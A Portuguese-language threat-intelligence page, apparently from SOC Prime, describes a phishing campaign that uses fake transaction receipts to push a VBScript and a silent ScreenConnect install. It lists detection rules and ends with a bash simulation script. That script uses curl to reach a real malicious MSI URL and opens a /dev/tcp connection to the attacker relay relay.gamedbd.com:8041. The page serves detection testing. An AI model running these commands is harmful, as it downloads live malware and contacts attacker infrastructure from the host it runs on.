SOC Prime Bias: High

19 Aug 2026 07:43 UTC

Malware Phishing/Scam: Emails de Phishing Disfarçados como Recibos de Transações

Author Photo
SOC Prime Team linkedin icon Seguir
Malware Phishing/Scam: Emails de Phishing Disfarçados como Recibos de Transações
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os agentes de ameaça estão enviando e-mails de phishing que se fazem passar por funcionários de empresas dos EUA e incluem anexos disfarçados como recibos de transações. O ataque utiliza um PDF malicioso para atrair os usuários a baixarem uma suposta atualização do Adobe Flash Player que na verdade inicia um VBScript. O script então instala a ferramenta legítima de gerenciamento remoto ScreenConnect para estabelecer acesso remoto persistente para atividades subsequentes.

Investigação

O AhnLab Security Intelligence Center (ASEC) identificou a campanha examinando o conteúdo do e-mail de phishing e o comportamento do PDF anexado. A investigação rastreou a cadeia de execução desde o VBScript malicioso até a recuperação de carga em segundo plano e a instalação silenciosa de um pacote MSI usando curl.exe and msiexec.exe.

Mitigação

Os usuários devem ser treinados para reconhecer tentativas de phishing envolvendo recibos de transações inesperados e solicitações para instalar atualizações de software como o Adobe Flash Player. As organizações devem restringir a execução de VBScripts e monitorar o uso não autorizado de ferramentas de gerenciamento remoto, incluindo o ScreenConnect. A lista de permissões de aplicativos também pode ajudar a prevenir a execução de pacotes MSI desconhecidos ou não aprovados.

Resposta

Se uma atividade maliciosa for detectada, o sistema afetado deve ser isolado imediatamente para evitar o acesso remoto através do ScreenConnect. Os respondedores devem encerrar sessões ativas associadas com relay.Gamedbd.Com infraestrutura e inspecionar o registro para armazenar informações de sessão. Uma investigação forense completa também deve determinar se ocorreu movimentação lateral ou exfiltração de dados através da ferramenta de gerenciamento remoto.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

LOLBAS WScript / CScript (via criação de processo)

Equipe SOC Prime
18 Ago 2026

Software de Acesso Remoto/ Gestão Alternativo (via criação de processo)

Equipe SOC Prime
18 Ago 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)

Equipe SOC Prime
18 Ago 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)

Equipe SOC Prime
18 Ago 2026

IOCs (HashMd5) para detectar: Malware Phishing/Enganação: E-mails de Phishing Disfarçados como Recibos de Transações

Regras de IA da SOC Prime
18 Ago 2026

Detecção de E-mails de Phishing Disfarçados como Recibos de Transações [Proxy]

Regras de IA da SOC Prime
18 Ago 2026

E-mail de Phishing Imitando Recibo de Transação Levando à Instalação de Pacote MSI [Criação de Processo do Windows]

Regras de IA da SOC Prime
18 Ago 2026

Execução de Simulação

Pré-requisito: O Check do Pré-vôo de Telemetria & Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa & Comandos do Ataque: O adversário inicia uma campanha de phishing enviando um e-mail sobre uma transação falhada. O link direciona a vítima para https://transaction-sucessful.vercel.app, que hospeda um recibo falso. Quando a vítima clica em “Baixar Recibo”, o navegador tenta buscar https://payment-six-eta.vercel.app/doc/sc.msi. Uma vez que a carga é executada, ela tenta estabelecer uma sessão de acesso remoto conectando-se ao relay ScreenConnect em relay.gamedbd.com:8041. Esta sequência testa tanto a detecção baseada em URL quanto a lógica de detecção baseada em domínio/porta.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Script de simulação para acionar a regra de detecção Phishing/ScreenConnect
    
    echo "[+] Iniciando Simulação: Teste de Detecção Phishing/ScreenConnect"
    
    # 1. Simular o download do MSI malicioso do URL da Vercel
    echo "[+] Etapa 1: Simulando conexão ao URL malicioso da Vercel..."
    curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi"
    
    # 2. Simular a conexão ao domínio/porta específico do relay ScreenConnect
    echo "[+] Etapa 2: Simulando conexão ao relay malicioso ScreenConnect..."
    # Usamos /dev/tcp para simular uma tentativa de conexão sem precisar de um ouvinte real
    timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null
    
    echo "[+] Simulação Completa. Verifique o SIEM para alertas."
  • Comandos de Limpeza:

    # Nenhum artefato persistente é criado por esta simulação baseada em rede.
    # Se quaisquer arquivos locais foram baixados, eles devem ser removidos:
    rm -f sc.msi
    echo "[+] Limpeza completa."